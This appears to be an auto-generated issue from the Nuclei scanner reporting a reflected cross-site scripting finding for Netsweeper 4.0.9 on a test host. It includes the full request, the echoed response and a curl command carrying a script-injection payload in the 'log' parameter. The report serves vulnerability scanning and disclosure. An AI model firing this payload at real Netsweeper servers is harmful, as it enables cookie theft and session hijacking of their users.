mkrs2404 / tickets

Netsweeper 4.0.9 - Cross-Site Scripting (netsweeper-rxss) found on honey.scanme.sh #58

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: netsweeper-rxss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter

Timestamp: Tue Apr 30 19:28:58 +0530 IST 2024

Template Information

| Key | Value |
| --- | --- |
| Name | Netsweeper 4.0.9 - Cross-Site Scripting |
| Authors | daffainfo |
| Tags | edb, xss, packetstorm, netsweeper |
| Severity | high |
| Description | Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. |
| CVSS-Metrics | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
| CWE-ID | CWE-79 |
| CVSS-Score | 7.20 |

Request

GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 439
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:58 GMT

GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=</script><script>alert(document.domain)</script>&sortitem&filter HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54' 'https://honey.scanme.sh/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter'

Generated by Nuclei v3.2.5